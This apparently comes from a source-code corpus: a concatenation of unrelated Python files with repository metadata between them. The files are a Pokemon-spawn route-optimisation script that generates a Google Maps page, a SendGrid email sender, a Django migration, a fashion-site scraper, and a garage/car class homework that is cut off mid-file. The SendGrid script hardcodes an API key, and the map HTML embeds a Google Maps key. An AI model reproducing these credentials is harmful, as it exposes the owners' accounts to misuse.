def add_adress(self, lat=37.754242, lng=-122.383602):
""" Add register at iloc 0 with your adress.
default : 24th St, San Francisco, CA 94107, États-Unis
"""
#{{{
s2 = pd.Series(['0', 'my_adress', lat, lng], index=['num', 'name', 'lat', 'lng'])
self.df_few.loc[-1] = s2
self.df_few = self.df_few.sort_index()
self.df_few = self.df_few.reset_index()
#}}}
def construct_df_rarest(self, threshold=10):
""" Compute df_rarest with the threshold percents of the rarest. """
#{{{
print "Couting spawns ..."
self.df_counts = (self.df.groupby("name").size().to_frame()
.reset_index(level=0)
.rename(columns={0: "Count", "name": "Pokemon"})
.sort_values(by="Count", ascending=False))
total_count = sum(self.df_counts.Count)
n_last_lines = int(self.df_counts.size*threshold/100)
counts_reduced = self.df_counts.tail(n_last_lines)
print "Constructing df_rarest ..."
self.df_rarest = self.df.loc[self.df["name"].isin(counts_reduced["Pokemon"])]
#}}}
def plot_spawn_counts(self, ax):
""" barplot of df_rarest """
#{{{
# self argument needed, cf :
# http://sametmax.com/quelques-erreurs-tordues-et-leurs-solutions-en-python/
ax = sns.barplot(x="Pokemon", y="Count", data=self.df_counts, palette="GnBu_d")
ax.set_xlabel("Pokemon")
ax.set_xticklabels(self.df_counts["Pokemon"], rotation=90)
ax.set_ylabel("Number of Spawns")
return(ax)
#}}}
def write_rarest_csv(self, path="./data/", threshold=10):
""" df_rarest to csv with normalized filename. """
#{{{
full_path = path + "pokemon-spawns-" + str(int(threshold*100)) + "%-rarest.csv"
print "Writting" + full_path + " ..."
self.df_rarest.to_csv(full_path, index=False)
#}}}
#}}}
################################################################
#
# Shortest Path algorithms :
#
################################################################
def verify_path(G, list_of_nodes):
""" Function to verify if a path exists in the ordered list_of_nodes.
Remark : it will always be the case with complete graph.
return : bool
"""
#{{{
path_found=True
for i in range(0,len(list_of_nodes)-1):
if not list_of_nodes[i+1] in G.neighbors(list_of_nodes[i]):
path_found=False
return path_found
#}}}
def brute_force(G):
""" brute_force compute all combination of nodes path and get
the shortest.
Verification if the path exists from a list of nodes is used.
"""
#{{{
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
perm_array = np.arange(1, num_nodes)
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
dist = 0
for i in range(len(list_of_nodes)-1):
dist = dist + G[list_of_nodes[i]][list_of_nodes[i+1]]['weight']
if (dist < min_dist):
opt_list_of_nodes = list(list_of_nodes)
min_dist = dist
return min_dist, opt_list_of_nodes
#}}}
def swap(array, n1, n2):
tmp = array[n1]
array[n1] = array[n2]
array[n2] = tmp
return array
def backtrack_defby_rec(G, list_of_nodes, i_node=0, dist_tmp=0,
min_dist=np.inf, opt_list_of_nodes=[]):
""" backtrack_defby_rec : backtrack using verify_path function
for solution viability, and already computed minimal dist
to check if valid solution.
It is a function defined by recurrency, so be carefull with
variables scoops.
"""
#{{{
num_nodes = G.order()-1
# print "----------------------------------------"
# print "backtrack_defby_rec have been called with :"
# print "i_node = ", i_node
# print "min_dist = ", min_dist
# print "dist_tmp = ", dist_tmp
# print "list_of_nodes = ", list_of_nodes
# print "opt_list_of_nodes = ", opt_list_of_nodes
if(i_node == num_nodes):
min_dist = dist_tmp + G[list_of_nodes[num_nodes]][list_of_nodes[0]]['weight']
opt_list_of_nodes = np.append(list_of_nodes, 0)
else:
for i in range(i_node+1, num_nodes+1):
list_of_nodes = swap(list_of_nodes, i_node+1, i)
# Not necessary for complete graph :
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
# Won't work :
# dist_tmp = dist_tmp + G[list_of_nodes[i_node]][list_of_nodes[i_node+1]]['weight']
# problem with shared memory between calls
new_dist = dist_tmp + G[list_of_nodes[i_node]][list_of_nodes[i_node+1]]['weight']
if (new_dist < min_dist):
min_dist_returned, opt_list_of_nodes_returned = \
backtrack_defby_rec(G, list_of_nodes=list_of_nodes,
i_node=i_node+1,
dist_tmp=new_dist,
min_dist=min_dist,
opt_list_of_nodes=opt_list_of_nodes)
if(min_dist_returned < min_dist):
min_dist = min_dist_returned
opt_list_of_nodes = opt_list_of_nodes_returned
list_of_nodes = swap(list_of_nodes, i_node+1, i)
return(min_dist, opt_list_of_nodes)
#}}}
def list_of_nodes_to_dist(G, list_of_nodes, min_dist):
""" Compute the path's distance from a list_of_nodes belonging to G
list_of_nodes : <list>
"""
#{{{
dist = 0
loop_broken = False
for i in range(len(list_of_nodes)-1):
dist = dist + G[list_of_nodes[i]][list_of_nodes[i+1]]['weight']
if dist > min_dist:
loop_broken = True
break
if loop_broken is True:
return(np.inf)
else:
return(dist)
#}}}
def backtrack(G):
""" backtrack : backtrack using verify_path function
for solution viability, and already computed minimal dist
to check if valid solution.
"""
#{{{
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
perm_array = np.arange(1, num_nodes)
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
# promissor inside list_of_nodes_to_dist function
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist:
min_dist = dist
opt_list_of_nodes = list(list_of_nodes)
return min_dist, opt_list_of_nodes
#}}}
def branch_and_bound(G):
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
# Choice : subsets are possibles paths with second node already choosed
for i in np.arange(1,num_nodes):
perm_array = np.arange(1, num_nodes)
np.delete(perm_array, i)
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0, i] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
# promissor inside list_of_nodes_to_dist function
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist:
min_dist = dist
opt_list_of_nodes = list_of_nodes
return min_dist, opt_list_of_nodes
def smallest_edge(G, idx_nodes_used, idx_node):
# idx_node is the index of the node considered in left_in_LoN
num_nodes = G.order()
min_dist = np.inf
for k in range(0, num_nodes):
if not(k in idx_nodes_used):
dist_tmp = G[idx_node][k]['weight']
if dist_tmp < min_dist:
min_dist = dist_tmp
idx_next_node = k
return idx_next_node, min_dist
# Strategy used : always choose the shortest edge
def heuristic_shortest_edge(G, idx_first_node = 0):
num_nodes = G.order()-1
dist_path = 0
idx_nodes_used = [idx_first_node]
idx_current_node = idx_first_node
while (len(idx_nodes_used)-1 < num_nodes):
# finding smallest edge :
idx_next_node, min_dist_edge = smallest_edge(G,
idx_nodes_used = idx_nodes_used,
idx_node = idx_current_node)
# Update values :
dist_path = dist_path + min_dist_edge
idx_nodes_used.append(idx_next_node)
idx_current_node = idx_next_node
# Add distance to make a cicle :
dist_path = dist_path + G[idx_first_node][idx_next_node]['weight']
idx_nodes_used.append(idx_first_node)
return dist_path, idx_nodes_used
def heuristic_neighboors(G, idx_first_node = 0):
""" Heuristic greedy with permutations tests in the neighbors. """
num_nodes = G.order()
dist = 0
min_dist, opt_list_of_nodes = heuristic_shortest_edge(G)
list_of_nodes = list(opt_list_of_nodes) #copy
for i in range(1, num_nodes):
for j in [x for x in range(1, num_nodes) if x != i]:
list_of_nodes = swap(list_of_nodes, i,j)
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist :
min_dist = dist
opt_list_of_nodes = list(list_of_nodes) #copy
list_of_nodes = swap(list_of_nodes, i,j)
return(min_dist, opt_list_of_nodes)
# Class wrappers for resolution methods :
class graphWrapper:
"""
- G : NetworkX graph
node_scheme = ['num', 'name', 'lat', 'lng']
edge : weight=dist, label=dist+"km"
- df_scores : <pandas.DataFrame> of execution time and results
obtained by shortest path algos
schema = [ 'Algo', 'Execution Time [s]', 'Shortest Path [km]',
'List of nodes ordered']
"""
#{{{ Methods of graphWrapper
def __init__(self, df): #constructor
print "Constructing NetworkX Graph ..."
self.df_to_nx_complete(df)
# Initialize df_scores :
self.df_scores = pd.DataFrame(columns=['Execution Time [s]',
'Shortest Path [km]', 'List of nodes ordered'])
def df_to_nx_complete(self, df):
""" Construct <networkx.classes.graph.Graph> from
<pandas.DataFrame> as a complete graph ('as the crow flies').
"""
#{{{
n = df.shape[0]
self.G = nx.complete_graph(0)
for i in range(0,n):
self.G.add_node(i, \
num=df.iloc[i].loc["num"], \
name=df.iloc[i].loc["name"], \
lat=df.iloc[i].loc["lat"], \
lng=df.iloc[i].loc["lng"] \
)
for i in range(0,n-1):
for j in range(i+1,n):
dist = compute_dist(self.G.node[i]["lat"], self.G.node[i]["lng"], \
self.G.node[j]["lat"], self.G.node[j]["lng"])
dist_trunc_str = str(int(dist)) + "km"
self.G.add_edge(i, j, weight=dist, label=dist_trunc_str)
#}}}
def __str__(self):
""" print method of this class result in the bash cmd display of
an agraph saved as png. """
#{{{
# converting to Agraph :
K_agraph = nx.nx_agraph.to_agraph(self.G)
# Modifying attributes :
palette = sns.color_palette("RdBu", n_colors=7)
K_agraph.graph_attr['label']='San Fransisco Dragonair Pop'
K_agraph.graph_attr['fontSize']='12'
K_agraph.graph_attr['fontcolor']='black'
# K_agraph.graph_attr['size']='1120,1120'
# K_agraph.graph_attr.update(colorscheme=palette, ranksep='0.1')
K_agraph.node_attr.update(color='red')
K_agraph.edge_attr.update(color='blue')
# Displaying by saving first and delete at the end
K_agraph.write("tmp.dot")
K_agraph.draw('tmp.png', prog="circo")
command = "display -geometry 1200x720 tmp.png"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
print "Displaying graph process returncode = ", process.returncode
command = "rm tmp.png tmp.dot"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
#}}}
def wrapp_shortest_path(self, algo):
""" add a register to df_scores"""
#{{{
algo_str = re.search('<function (.+?) at', str(algo)).group(1)
print "Computing Shortest Path with " + algo_str + " ..."
start_time = time.time()
if algo_str == 'backtrack_defby_rec':
list_of_nodes = np.arange(self.G.order())
min_dist, opt_LoN = algo(self.G, list_of_nodes)
opt_LoN = list(opt_LoN)
else:
min_dist, opt_LoN = algo(self.G)
end_time = time.time()
total_time = end_time - start_time
self.df_scores.loc[algo_str] = [total_time, min_dist, opt_LoN]
#}}}
def compute_shortest_path(self, algo_nml=
[brute_force, backtrack, backtrack_defby_rec, heuristic_shortest_edge]):
""" Compute Shortest Paths using algos in algo_nml. """
for e in algo_nml:
self.wrapp_shortest_path(e)
def display_scores(self):
fig, ax = render_mpl_table(self.df_scores, header_color=color_blue,
row_colors=['w', 'w'], edge_color='w')
return fig, ax
#}}}
def write_pok_gmap_loc(dfs,
pathname=working_dir_path+"/html_generated_by_python/"):
""" Experimentation of vizualization using GoogleMap API. """
#{{{
fout = pathname + '-'.join(dfs.pok_nml_few).lower() + "-locations.txt"
print "Writting ", fout, " ..."
f = open(fout, 'w')
for i in range(dfs.df_few.shape[0]):
line = dfs.df_few.iloc[i]
tmp = str(line["lat"]) + "," + str(line["lng"]) + "\n"
# print tmp
f.write(tmp)
f.close()
fhtml = pathname + "gmap_" + '-'.join(dfs.pok_nml_few).lower() + ".html"
print "Writting ", fhtml, " ...\n"
f = open(fhtml, 'w')
f.write("""<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="initial-scale=1.0, user-scalable=no">
<meta charset="utf-8">
<title>San Fransisco Rare Pokemons Hunt</title>
<style>
/* Always set the map height explicitly to define the size of the div
* element that contains the map. */
#map {
height: 100%;
width: 70%;
}
/* Optional: Makes the sample page fill the window. */
html, body {
height: 100%;
margin: 0;
padding: 0;
}
#right-panel {
font-family: 'Roboto','sans-serif';
line-height: 30px;
padding-left: 10px;
}
#right-panel select, #right-panel input {
font-size: 20px;
}
#right-panel select {
width: 100%;
}
#right-panel i {
font-size: 20px;
}
html, body {
height: 100%;
margin: 0;
padding: 0;
}
#right-panel {
float: right;
width: 28%;
padding-left: 2%;
}
#output {
font-size: 15x;
}
</style>
</head>
<body>
<div id="right-panel">
<div id="inputs">
<pre>
""")
pok_list_str = "" + "var pok_list = [\n"
for i in range(0,dfs.df_few.shape[0]):
tmp_str = " ['" + str(dfs.df_few.iloc[i].loc["name"]) + "', " \
+ str(dfs.df_few.iloc[i].loc["lat"]) + ", " \
+ str(dfs.df_few.iloc[i].loc["lng"]) + ", " \
+ str(i) + "],\n"
pok_list_str = pok_list_str + tmp_str
pok_list_str = pok_list_str + " ];\n"
f.write(pok_list_str)
f.write("""
</pre>
</div>
<div>
<strong>Results</strong>
</div>
<div id="output"></div>
</div>
<div id="map"></div>
<script>
function initMap() {
var map = new google.maps.Map(document.getElementById('map'), {
zoom: 10,
center: {lat: 37.615223, lng: -122.389977},
mapTypeId: 'terrain'
});
var dragonairImage = {
url: 'http://pre00.deviantart.net/73f7/th/pre/i/2013/024/f/5/dragonair_by_darkheroic-d5sizqi.png',
size: new google.maps.Size(70,70),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(60, 60),
labelOrigin: new google.maps.Point(9, 8)
};
var homeImage = {
url: 'http://www.icone-png.com/png/54/53529.png',
size: new google.maps.Size(30,30),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(30, 30),
labelOrigin: new google.maps.Point(-5, 8)
};
var charmeleonImage = {
url: 'http://pokemonbr.net/wp-content/uploads/2016/08/charmeleon.png',
size: new google.maps.Size(50,50),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(50, 50),
labelOrigin: new google.maps.Point(-5, 8)
};
var porygonImage = {
url:'http://vignette2.wikia.nocookie.net/pokemon/images/3/3b/137Porygon_AG_anime.png/revision/latest?cb=20141006025936',
size: new google.maps.Size(50,50),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(50, 50),
labelOrigin: new google.maps.Point(-5, 8)
};
// Shapes define the clickable region of the icon. The type defines an HTML
// <area> element 'poly' which traces out a polygon as a series of X,Y points.
// The final coordinate closes the poly by connecting to the first coordinate.
var shape = {
coords: [0, 0, 0, 50, 50, 50, 50, 0],
type: 'poly'
};
""")
pok_list_str = " " + "var pok_list = [\n"
for i in range(0,dfs.df_few.shape[0]):
tmp_str = " ['" + str(dfs.df_few.iloc[i].loc["name"]) + "', " \
+ str(dfs.df_few.iloc[i].loc["lat"]) + ", " \
+ str(dfs.df_few.iloc[i].loc["lng"]) + ", " \
+ str(i) + "],\n"
pok_list_str = pok_list_str + tmp_str
pok_list_str = pok_list_str + " ];\n"
f.write(pok_list_str)
f.write("""
// Markers :
for (var i = 0; i < pok_list.length; i++) {
var mark = pok_list[i];
if(mark[0]=="Dragonair"){
var icon = dragonairImage;
}
if(mark[0]=="Charmeleon"){
var icon = charmeleonImage;
}
if(mark[0]=="Porygon"){
var icon = porygonImage;
}
if(mark[0]=="my_adress"){
var icon = homeImage;
}
var marker = new google.maps.Marker({
position: {lat: mark[1], lng: mark[2]},
map: map,
icon: icon,
shape: shape,
title: mark[0] + " : " + mark[3],
zIndex: mark[3],
label: {
text: i.toString(),
fontWeight: 'bold',
fontSize: '40px',
fontFamily: '"Courier New", Courier,Monospace',
color: 'black'
}
});
}
var bounds = new google.maps.LatLngBounds; // automate bounds
var dist = '';
var outputDiv = document.getElementById('output');
outputDiv.innerHTML = 'From ----> To ----> distance <br>';
// Distances :
function calcDistance(origin1,destinationB,ref_Callback_calcDistance, k, n){
var service = new google.maps.DistanceMatrixService();
var temp_duration = 0;
var temp_distance = 0;
var testres;
service.getDistanceMatrix(
{
origins: [origin1],
destinations: [destinationB],
travelMode: google.maps.TravelMode.DRIVING,
unitSystem: google.maps.UnitSystem.METRIC,
avoidHighways: false,
avoidTolls: false
}, function(response, status) {
if (status !== google.maps.DistanceMatrixStatus.OK) {
alert('Error was: ' + status);
testres= {"duration":0,"distance":0};
} else {
var originList = response.originAddresses;
var destinationList = response.destinationAddresses;
var showGeocodedAddressOnMap = function (asDestination) {
testres = function (results, status) {
if (status === 'OK') {
map.fitBounds(bounds.extend(results[0].geometry.location));
} else {
alert('Geocode was not successful due to: ' + status);
}
};
};
for (var i = 0; i < originList.length; i++) {
var results = response.rows[i].elements;
for (var j = 0; j < results.length; j++) {
temp_duration+=results[j].duration.text;
temp_distance+=results[j].distance.text;
}
}
testres=[temp_duration,temp_distance];
if(typeof ref_Callback_calcDistance === 'function'){
//calling the callback function
ref_Callback_calcDistance(testres, k, n)
}
}
}
);
}
function Callback_calcDistance(testres, k, n) {
dist = testres[1];
outputDiv.innerHTML += k + ' ----> ' + n + ' ----> ' + dist + '<br>'
console.log(testres[1]);
}
for (var k = 0; k < pok_list.length; k++) {
var origin = new google.maps.LatLng(pok_list[k][1], pok_list[k][2]);
for (var n = 0; n < pok_list.length; n++) {
if (n !== k) {
var dest = new google.maps.LatLng(pok_list[n][1],pok_list[n][2]);
//calling the calcDistance function and passing callback function reference
calcDistance(origin, dest, Callback_calcDistance, k,n);
}
}
}
}
</script>
<script async defer
src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCgu_eNgt-Hiu0HAnZwkIWYcnUoLsGSqVs&callback=initMap">
</script>
</body>
</html>
""")
f.close()
#}}}
def setup_argparser():
""" Define and return the command argument parser. """
#{{{
parser = argparse.ArgumentParser(description='''Graph Optimizatino Study.''')
parser.add_argument('--show_counts', action='store_true', default=False, dest='show_counts',
help='whether to run counts analysis or not')
parser.add_argument('--adress', action='store', nargs=1, type=float,
default=[37.877875, -122.305926], dest='adress', metavar=['lat','lnt'],
help='which latitude and longitude for Home Adress ')
parser.add_argument('--poks_hunted', default="Dragonair", dest='poks_hunted',
type=str, metavar="'Dragonair, Porygon, ...'",
help="which pokemons to hunt in comma separated list ")
return parser
#}}}
def setup_paths(list_of_paths):
""" Create defaults directories if needed. """
for p in list_of_paths:
try:
os.makedirs(p)
except OSError as exc: # Python >2.5
if exc.errno != errno.EEXIST:
raise
def main():
parser = setup_argparser()
try:
args = parser.parse_args()
except argparse.ArgumentError as exc:
log.exception('Error parsing options.')
parser.error(str(exc.message))
raise
setup_paths([default_result_dir, default_html_dir])
if (args.show_counts): # will only compute count barplot
dfs = wrapperDataFrame()
dfs.construct_df_rarest()
fig, ax = plt.subplots(figsize=(30, 30))
dfs.plot_spawn_counts(ax)
plt.show() # interactive plot
return
# Convert from string to list of string
poks_hunted_list = args.poks_hunted.split(",")
poks_hunted_list = map(str.strip, poks_hunted_list)
dfs = wrapperDataFrame(pok_nml_few = poks_hunted_list)
from IPython import embed; embed() # Enter Ipython
# dfs.add_adress(lat=37.877875, lng=-122.305926)
dfs.add_adress(lat=args.adress[0], lng=args.adress[1])
# Generating html file :
write_pok_gmap_loc(dfs)
print dfs
n_poks = dfs.df_few.shape[0]
Gwrap = graphWrapper(dfs.df_few)
# print Gwrap
print "--------------------------------------------"
print "For Graph of n=", n_poks
# Gwrap.wrapp_shortest_path(brute_force)
# Gwrap.compute_shortest_path()
# Preventing brute_force long computation :
# if n_poks < 7 :
# algo_nml = [brute_force, backtrack, backtrack_defby_rec,
# heuristic_shortest_edge, heuristic_neighboors]
# else :
# algo_nml = [backtrack, backtrack_defby_rec,
# heuristic_shortest_edge, heuristic_neighboors]
algo_nml = [brute_force, backtrack, backtrack_defby_rec,
heuristic_shortest_edge, heuristic_neighboors]
Gwrap.compute_shortest_path(algo_nml = algo_nml)
print Gwrap.df_scores
fig, ax = Gwrap.display_scores()
fig.suptitle("Graph Order = " + str(n_poks))
filename = default_result_dir + "table_score_n_poks_" + str(n_poks)
plt.savefig(filename, bbox_inches='tight')
# from IPython import embed; embed() # Enter Ipython
# plt.show() # interactive plot
if __name__ == '__main__':
main()
|
[
"jeusel.guillaume@gmail.com"
] |
jeusel.guillaume@gmail.com
|
cf15dcd2ca3d40597a02c382669e1827c8223f69
|
092eccf44865839781f51ab237d1821b7f5e3e98
|
/fcm.py
|
e69a2a4f7fe74d530ebb618917cc95cdcdc24615
|
[] |
no_license
|
amit-kumar56/Online-result-alert-system
|
27f7945081408085dccbaa03dcf454a39e8ed525
|
e769461540ab1c8b959d4b95245affff9e4427da
|
refs/heads/master
| 2023-08-05T08:22:55.176174
| 2019-11-10T08:29:50
| 2019-11-10T08:29:50
| 220,761,968
| 3
| 0
| null | 2023-07-23T15:23:33
| 2019-11-10T08:27:38
|
HTML
|
UTF-8
|
Python
| false
| false
| 596
|
py
|
API_KEY = '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'
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
message = Mail(
from_email='amit1004199@gmail.com',
to_emails='amit10041999@gmail.com',
subject='Sending with Twilio SendGrid is Fun',
html_content='<strong>and easy to do anywhere, even with Python</strong>')
try:
sg = SendGridAPIClient(API_KEY)
response = sg.send(message)
print(response.status_code)
print(response.body)
print(response.headers)
except Exception as e:
print(str(e))
|
[
"noreply@github.com"
] |
amit-kumar56.noreply@github.com
|
a6992f4bad90dc92d519975bf9c75e969005b0f3
|
1d14584f0cc5b587dc6da465a36d089a20f778dd
|
/backend/apps/notes/migrations/0002_notes_public.py
|
1a8c61f3a44bf0597e20e7226a46d7f529bae01b
|
[] |
no_license
|
sameerk129/DocShare
|
20163da35412546024c2fc663d3c552ee48607ec
|
97e156313bb0af55af85a21f845bfc3a7b21211b
|
refs/heads/master
| 2020-03-18T14:16:19.501831
| 2018-05-26T22:08:41
| 2018-05-26T22:08:41
| 134,839,430
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-05-26 05:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notes', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='notes',
name='public',
field=models.BooleanField(default=False),
),
]
|
[
"sameer.k@greyorange.sg"
] |
sameer.k@greyorange.sg
|
bafe4a257c0c6e015913bdce3beef8e2b5485cba
|
24927eac464cdb1bec665f1cb4bfee85728ec5e1
|
/product_parser/valentino.py
|
4e82a6c7fc7534ee0a25943591dcb384efe6e842
|
[] |
no_license
|
yingl/fashion-spider
|
d72ea8dfd4a49270fd3e64e7a507d6fcbaaf492c
|
0698768cd21d509ec335d7202a753be4f6ad378b
|
refs/heads/master
| 2021-01-01T18:14:17.848732
| 2017-09-27T08:44:47
| 2017-09-27T08:44:47
| 98,282,505
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,336
|
py
|
""" Valentino """
# coding: utf-8
import sys
sys.path.append('../')
import util
BRAND = 'valentino'
PREFIXES = ['www.valentino.cn']
def get_title(driver):
title = ''
element = util.find_element_by_css_selector(driver, 'div.item-info > h1 > div.title > span.value')
if not element:
raise Exception('Title not found for %s' % driver.current_url)
else:
title = element.text.strip()
return title
def get_code(driver):
code = ''
element = util.find_element_by_css_selector(driver, 'span.inner.modelName')
if element:
code = element.text.strip()
return code
def get_price(driver):
price = 0
text = ''
element = util.find_element_by_css_selector(driver, 'div.item-price > div > span.price > span.value')
if element:
text = element.text.strip().replace(',', '')
price = float(text) if text else 0
return price
def get_images(driver):
images = ''
texts = []
elements = util.find_elements_by_css_selector(driver, 'div.overlayElements > ul > li > img')
for element in elements:
# <img alt="VALENTINO GARAVANI UOMO MY0B0581RAU E41 Tote 手袋 U f" class="alternativeImageZoom" data-ytos-code10="45341239JA" data-ytos-image-shot="f" data-ytos-image-size="14_n" itemprop="image" sizes="100vw" srcset="https://media.yoox.biz/items/45/45341239ja_11_n_f.jpg 320w,https://media.yoox.biz/items/45/45341239ja_13_n_f.jpg 631w,https://media.yoox.biz/items/45/45341239ja_14_n_f.jpg 1570w">
code = element.get_attribute('data-ytos-code10').strip().lower()
shot = element.get_attribute('data-ytos-image-shot').strip().lower()
size = element.get_attribute('data-ytos-image-size').strip().lower()
texts.append('https://media.yoox.biz/items/45/' + code + '_' + size + '_' + shot + '.jpg')
images = ';'.join(texts)
return images
def parse(driver, url):
try:
driver.get(url)
except:
pass
good = {'brand':BRAND}
good['url'] = url
good['title'] = get_title(driver)
good['code'] = get_code(driver)
good['unit'] = 'RMB'
good['price'] = get_price(driver)
good['images'] = get_images(driver)
return good
def main():
driver = util.create_chrome_driver()
print(parse(driver, sys.argv[1]))
driver.quit()
if __name__ == '__main__':
main()
|
[
"linying_43151@163.com"
] |
linying_43151@163.com
|
0ff63d72300563a3b0e9143ed83bdb4c93fae7f2
|
24be9d9e10f8e0f4fa5d222811fd1ab5831d9f28
|
/serialization/homework4.py
|
277b677d20b56f732d44c746f342fbcf681d95ac
|
[] |
no_license
|
zulteg/python-course-alphabet
|
470149c3e4fd2e58bdde79a2908ffba1d7438dc1
|
dd2399f6f45c42c5847cf3967441a64bdb64a4cf
|
refs/heads/master
| 2020-05-14T21:25:02.627900
| 2019-09-17T10:19:51
| 2019-09-17T10:19:51
| 181,962,678
| 0
| 0
| null | 2019-06-20T08:39:27
| 2019-04-17T20:20:47
|
Python
|
UTF-8
|
Python
| false
| false
| 10,835
|
py
|
import uuid
from objects_and_classes.homework.constants import CARS_TYPES, CARS_PRODUCER, TOWNS
"""
Вам небхідно написати 3 класи. Колекціонери Гаражі та Автомобілі.
Звязкок наступний один колекціонер може мати багато гаражів.
В одному гаражі може знаходитися багато автомобілів.
"""
"""
Колекціонер має наступні характеристики
name - значення типу str. Його ім'я
garages - список з усіх гаражів які належать цьому Колекціонеру. Кількість гаражів за замовчуванням - 0
register_id - UUID; Унікальна айдішка Колекціонера.
Повинні бути реалізовані наступні методи:
hit_hat() - повертає ціну всіх його автомобілів.
garages_count() - вертає кількість гаріжів.
сars_count() - вертає кількість машиню
add_car() - додає машину у вибраний гараж. Якщо гараж не вказаний, то додає в гараж, де найбільше вільних місць.
Якщо вільних місць немає повинне вивести повідомлення про це.
Колекціонерів можна порівнювати за ціною всіх їх автомобілів.
"""
class Cesar:
def __init__(self, name=None, garages=None, register_id=None):
if not register_id:
self.register_id = uuid.uuid4()
else:
self.update_register_id(register_id)
try:
name = str(name)
except ValueError:
raise ValueError("Invalid name value")
self.name = name
self.garages = {}
if garages:
if not isinstance(garages, list):
raise ValueError("Invalid garages value, must be list of garages")
for garage in garages:
self.add_garage(garage)
def __str__(self):
return f"Cesar {self.name} has {self.garages_count()} garages with {self.cars_count()} cars " \
f"total cost of ${self.hit_hat()}. Register id: {self.register_id}."
def __lt__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() < other.hit_hat()
def __le__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() <= other.hit_hat()
def __gt__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() > other.hit_hat()
def __ge__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() >= other.hit_hat()
def __eq__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() == other.hit_hat()
def add_car(self, car, garage=None):
if not isinstance(car, Car):
raise TypeError("Invalid car instance")
if not garage:
garage = self._get_emptiest_garage()
if not garage:
print("There are no empty garages")
return False
else:
if not isinstance(garage, Garage):
raise TypeError("Invalid garage instance")
if garage.has_owner() and garage.owner != self.register_id:
print("This garage has other owner")
return False
self.add_garage(garage)
garage.add(car)
def add_garage(self, garage):
if not isinstance(garage, Garage):
raise TypeError("Invalid instance of garage")
if garage not in self.garages:
garage.set_owner(self.register_id)
self.garages[garage] = garage
def _get_emptiest_garage(self):
garage = None
if self.garages:
garage = max(self.garages, key=lambda g: g.places_count())
if garage.places_count() == 0:
garage = None
return garage
def garages_count(self):
return len(self.garages)
def cars_count(self):
return sum([garage.cars_count() for garage in self.garages])
def hit_hat(self):
return sum([garage.hit_hat() for garage in self.garages])
def update_register_id(self, register_id):
self.register_id = uuid.UUID(hex=str(register_id))
"""
Гараж має наступні характеристики:
town - одне з перечислениз значеннь в TOWNS
cars - список з усіх автомобілів які знаходяться в гаражі
places - значення типу int. Максимально допустима кількість автомобілів в гаражі
owner - значення типу UUID. За дефолтом None.
Повинен мати реалізованими наступні методи
add(car) -> Добавляє машину в гараж, якщо є вільні місця
remove(cat) -> Забирає машину з гаражу.
hit_hat() -> Вертає сумарну вартість всіх машин в гаражі
"""
class Garage:
def __init__(self, town, places, owner=None, cars=None):
if town not in TOWNS:
raise Exception("Invalid town value")
self.town = town
try:
self.places = int(places)
except ValueError:
raise ValueError("Invalid places value")
if not owner:
self.owner = None
else:
self.set_owner(owner=owner)
self.cars = {}
if cars:
if not isinstance(cars, list):
raise ValueError("Invalid cars value, must be list of cars")
for car in cars:
self.add(car)
def __str__(self):
return f"This garage is in {self.town}, has {len(self.cars)}/{self.places} places. " \
f"Car total price: {self.hit_hat()}. It owner: {self.owner}"
def set_owner(self, owner):
if isinstance(owner, Cesar):
self.owner = owner.register_id
else:
try:
self.owner = uuid.UUID(hex=str(owner))
except ValueError:
raise ValueError("Invalid owner value")
def add(self, car):
if not isinstance(car, Car):
raise TypeError("Invalid instance of car")
if car.number in self.cars:
# print("This car is already added to this garage")
return False
if self.places <= len(self.cars):
print("There are no empty places in this garage")
return False
if car.number not in self.cars:
self.cars[car.number] = car
def remove(self, car):
if not isinstance(car, Car):
raise TypeError("Invalid instance of car")
if car.number not in self.cars:
print("This car is not in this garage")
else:
self.cars.pop(car.number, None)
def hit_hat(self):
return sum([car.price for car in self.cars.values()]) if self.cars else 0
def cars_count(self):
return len(self.cars)
def places_count(self):
return self.places - self.cars_count()
def has_owner(self):
return True if self.owner else False
"""
Автомобіль має наступні характеристики:
price - значення типу float. Всі ціни за дефолтом в одній валюті.
